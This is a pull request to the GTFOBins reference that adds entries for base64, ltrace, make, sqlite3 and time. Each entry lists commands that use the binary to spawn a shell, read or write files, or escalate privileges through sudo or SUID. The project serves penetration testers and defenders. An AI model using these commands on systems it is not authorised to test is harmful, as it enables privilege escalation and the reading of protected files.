### PR TITLE
Add base64, ltrace, make, sqlite3, time

### DIFF
--- a/_gtfobins/base64.md
+++ b/_gtfobins/base64.md
@@ -1,0 +1,15 @@
+---
+functions:
+  sudo-enabled:
+    - code: |
+        LFILE=file_to_read
+        sudo base64 "$LFILE" | base64 -d
+  suid-enabled:
+    - code: |
+        LFILE=file_to_read
+        ./base64 "$LFILE" | base64 -d
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        base64 "$LFILE" | base64 -d
+---

--- a/_gtfobins/ltrace.md
+++ b/_gtfobins/ltrace.md
@@ -1,0 +1,7 @@
+---
+functions:
+  execute-interactive:
+    - code: ltrace -b -L /bin/sh
+  sudo-enabled:
+    - code: sudo ltrace -b -L /bin/sh
+---

--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@@ -1,0 +1,23 @@
+---
+functions:
+  execute-interactive:
+    - code: |
+        COMMAND='/bin/sh 1>&2'
+        make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  execute-non-interactive:
+    - code: |
+        COMMAND=/usr/bin/id
+        make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  sudo-enabled:
+    - code: |
+        COMMAND=/usr/bin/id
+        sudo make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  suid-enabled:
+    - code: |
+        COMMAND=/usr/bin/id
+        ./make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  file-write:
+    - code: |
+        LFILE=file_to_write
+        make -s --eval="a := \$(file >$LFILE,data)" --eval='all:'
+---

--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@@ -1,0 +1,27 @@
+---
+functions:
+  sudo-enabled:
+    - code: |
+        LFILE=file_to_read
+        sudo sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
+  suid-enabled:
+    - code: |
+        LFILE=file_to_read
+        ./sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
+---

--- a/_gtfobins/time.md
+++ b/_gtfobins/time.md
@@ -1,0 +1,12 @@
+---
+description: |
+  Note that the shell might have its own builtin time implementation, which may
+  behave differently than /usr/bin/time.
+functions:
+  execute-interactive:
+    - code: /usr/bin/time /bin/sh
+  sudo-enabled:
+    - code: sudo /usr/bin/time /bin/sh
+  suid-enabled:
+    - code: ./time /bin/sh -p
+---


### PR DESCRIPTION
Note: Although make's documentation mentions `$(file <file_to_read)` , it didn't work on my machine. Maybe it was added in a later GNU make. I didn't add it in `make.md`.